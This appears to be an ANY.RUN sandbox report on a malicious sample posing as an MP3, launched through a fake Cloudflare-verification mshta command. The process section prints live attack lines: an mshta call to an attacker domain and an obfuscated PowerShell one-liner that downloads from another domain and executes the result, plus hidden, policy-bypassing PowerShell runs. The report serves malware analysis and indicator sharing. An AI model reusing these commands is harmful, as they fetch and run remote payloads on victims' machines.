Full analysis: https://app.any.run/tasks/16e40077-8dd2-4450-9b8a-ca1b72f912ef
Verdict: Malicious activity
Analysis date: April 04, 2025, 14:27:46
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: audio/mpeg
File info: Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
MD5: 302B94F6F12924C80C448626F98E578B
SHA1: 938AF1D0903AA81A6504C72EF3130C141E34E1C3
SHA256: 480DBECF96EE097D1B6CA930A05D8E8E4A1AE8F1BCFAB3885B48FAFBC77576B9
SSDEEP: 98304:nJI1ABLAc0xNxFqvaOYpCN+07C3dtHrsWPEtie38sc8T9VI7xQFxuPRsOWZbI+Fb:CB0ROrln9fhSbwiCGCuj5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • powershell.exe (PID: 8012)
      • powershell.exe (PID: 5164)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5164)
    • Changes powershell execution policy

      • mshta.exe (PID: 7920)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4164)
  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 8012)
    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 7920)
    • Base64-obfuscated command line is found

      • mshta.exe (PID: 7920)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7920)
      • powershell.exe (PID: 5164)
      • powershell.exe (PID: 8012)
    • The process executes Powershell scripts

      • powershell.exe (PID: 8012)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7920)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 5164)
      • powershell.exe (PID: 8012)
    • Probably obfuscated PowerShell command line is found

      • powershell.exe (PID: 5164)
    • Application launched itself

      • powershell.exe (PID: 8012)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7920)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8012)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8012)
    • Disables trace logs

      • powershell.exe (PID: 8012)
      • powershell.exe (PID: 4164)
    • Checks proxy server information

      • mshta.exe (PID: 7920)
      • powershell.exe (PID: 8012)
      • powershell.exe (PID: 4164)
      • slui.exe (PID: 5868)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 5164)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8012)
      • powershell.exe (PID: 4164)
    • Reads the software policy settings

      • slui.exe (PID: 5868)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.mp3 | LAME encoded MP3 audio (ID3 v2.x tag) (62.5)
.mp3 | MP3 audio (ID3 v2.x tag) (37.5)

EXIF

MPEG

MPEGAudioVersion: 1
AudioLayer: 3
AudioBitrate: 128 kbps
SampleRate: 44100
ChannelMode: Joint Stereo
MSStereo: Off
IntensityStereo: Off
CopyrightFlag: -
OriginalMedia:
Emphasis: None
VBRFrames: 10893
VBRBytes: 7012757
VBRScale: 80
Encoder: LAME3.99r
LameVBRQuality: 2
LameQuality: -
LameMethod: VBR (new/mtrh)
LameLowPassFilter: 18.5 kHz
LameBitrate: 32 kbps
LameStereoMode: Joint Stereo

ID3

Title: chilltrap
Artist: V-zen instrumental beat
Track: 55
RecordingTime: 2019
Genre: chillhop
SourceURL:
PublisherURL: http://www.jamendo.com
Publisher: http://www.jamendo.com
Composer: V-zen instrumental beat
UserDefinedText: (Tagging time) 2019-02-25T15:56:10
EncodedBy: Jamendo:http://www.jamendo.com| LAME
Comment: http://www.jamendo.com cc_standard
FileURL: http://www.jamendo.com/en/track/1624408
ArtistURL: http://www.jamendo.com/en/artist/343154
CopyrightURL: http://creativecommons.org/licenses/by-nc-nd/3.0/
Copyright: http://creativecommons.org/licenses/by-nc-nd/3.0/
PictureMIMEType: image/jpeg
PictureType: Front Cover
PictureDescription: -
Picture: (Binary data 14627 bytes, use -b option to extract)

Composite

DateTimeOriginal: 2019
AudioBitrate: 197 kbps
Duration: 0:04:45 (approx)
No data.
All screenshots are available in the full report
Total processes: 128
Monitored processes: 7
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Processes shown in the graph: mshta.exe, powershell.exe, conhost.exe (no specs), powershell.exe (no specs), powershell.exe, conhost.exe (no specs), slui.exe

Process information

PID: 1244
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4164
CMD: "C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Exec Unrestricted -C SI Variable:/YXJ 'https://cf.jolttapestry.fun/7456f63a46cc318334a70159aa3c4291';SV bD ([Net.WebClient]::New());Set-Variable y9g (((([Net.WebClient]::New()|Member)|Where{(GV _).Value.Name -clike'D*g'}).Name));(GV bD -ValueOnl).((GV y9g -Value))((Get-Variable YXJ).Value)|.( ''.SubString.ToString()[3,29,30]-Join'')
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 5164
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -exec unrestricted -w 1 -File C:\Users\admin\AppData\Roaming\fjlsjiaubyvcrs.ps1
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 5868
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Activation Client; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 7920
CMD: "C:\Windows\System32\mshta.exe" http://run.fox-chair-dust.xyz/ # "CIoudfIare Security Code: 5P2NB-MJ7C-8KV6-D2VWC"
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
PID: 8012
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E [base64-encoded command omitted; see the full report]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 8020
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 16 948
Read events: 16 931
Write events: 17
Delete events: 0

Modification events

PID 7920 mshta.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | Operation: write | Name: CachePrefix | Value: (empty)
PID 7920 mshta.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | Operation: write | Name: CachePrefix | Value: Cookie:
PID 7920 mshta.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | Operation: write | Name: CachePrefix | Value: Visited:
PID 4164 powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: EnableFileTracing | Value: 0
PID 4164 powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: EnableAutoFileTracing | Value: 0
PID 4164 powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: EnableConsoleTracing | Value: 0
PID 4164 powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: FileTracingMask | Value: (empty)
PID 4164 powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: ConsoleTracingMask | Value: (empty)
PID 4164 powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: MaxFileSize | Value: 1048576
PID 4164 powershell.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | Operation: write | Name: FileDirectory | Value: %windir%\tracing
Executable files: 0
Suspicious files: 2
Text files: 9
Unknown types: 0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
7920 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\0PO2MYFN.mp3 | - | - | -
8012 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0zvlewr1.wsw.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3uzzk2es.hqs.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y0c3rigi.jg1.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4164 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | 8E7D26D71A1CAF822C338431F0651251 | 495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
8012 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wkh5dm4v.2f1.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qd1h5opw.hjb.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5164 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | AFE6FCE31FD7D574BB314C317DC5D7DB | A4DD71F2695D81C115CE4934FBA367B2035165E4F565FF4A772862B41E164B27
4164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bbdc4ewa.zya.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8012 | powershell.exe | C:\Users\admin\AppData\Roaming\fjlsjiaubyvcrs.ps1 | text | 20D8D688F642C10D5E822E4B77066E45 | A04C635DEAD3EFFAB39362F70773D2ABBF6C6EEE2081B87D5849508AA53CC667
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 23
DNS requests: 17
Threats: 0

HTTP requests

Columns on the page: PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation (rows below list the values as extracted, in that order)
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.145:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
1660 | SIHClient.exe | GET | 200 | 23.52.120.96:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
1660 | SIHClient.exe | GET | 200 | 23.52.120.96:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
7920 | mshta.exe | GET | 200 | 188.114.97.3:80 | http://run.fox-chair-dust.xyz/ | unknown | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | whitelisted
51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5496 | MoUsoCoreWorker.exe | 23.48.23.145:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4 | System | 192.168.100.255:138 | whitelisted
7920 | mshta.exe | 188.114.97.3:80 | run.fox-chair-dust.xyz | CLOUDFLARENET | NL | unknown
3216 | svchost.exe | 172.172.255.217:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
6544 | svchost.exe | 40.126.32.76:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
8012 | powershell.exe | 174.138.125.138:443 | nopaste.net | DIGITALOCEAN-ASN | US | unknown
2104 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted

DNS requests

Domain | IP(s) | Reputation
settings-win.data.microsoft.com | 51.104.136.2, 51.124.78.146 | whitelisted
crl.microsoft.com | 23.48.23.145, 23.48.23.147, 23.48.23.140, 23.48.23.158, 23.48.23.194, 23.48.23.161, 23.48.23.156, 23.48.23.139, 23.48.23.138 | whitelisted
google.com | 142.250.186.142 | whitelisted
run.fox-chair-dust.xyz | 188.114.97.3, 188.114.96.3 | unknown
client.wns.windows.com | 172.172.255.217 | whitelisted
login.live.com | 40.126.32.76, 40.126.32.138, 40.126.32.134, 40.126.32.136, 20.190.160.17, 20.190.160.14, 20.190.160.3, 20.190.160.2 | whitelisted
ocsp.digicert.com | 2.17.190.73 | whitelisted
nopaste.net | 174.138.125.138 | unknown
cf.jolttapestry.fun | 188.114.97.3, 188.114.96.3 | unknown
slscr.update.microsoft.com | 172.202.163.200 | whitelisted

Threats

No threats detected
No debug info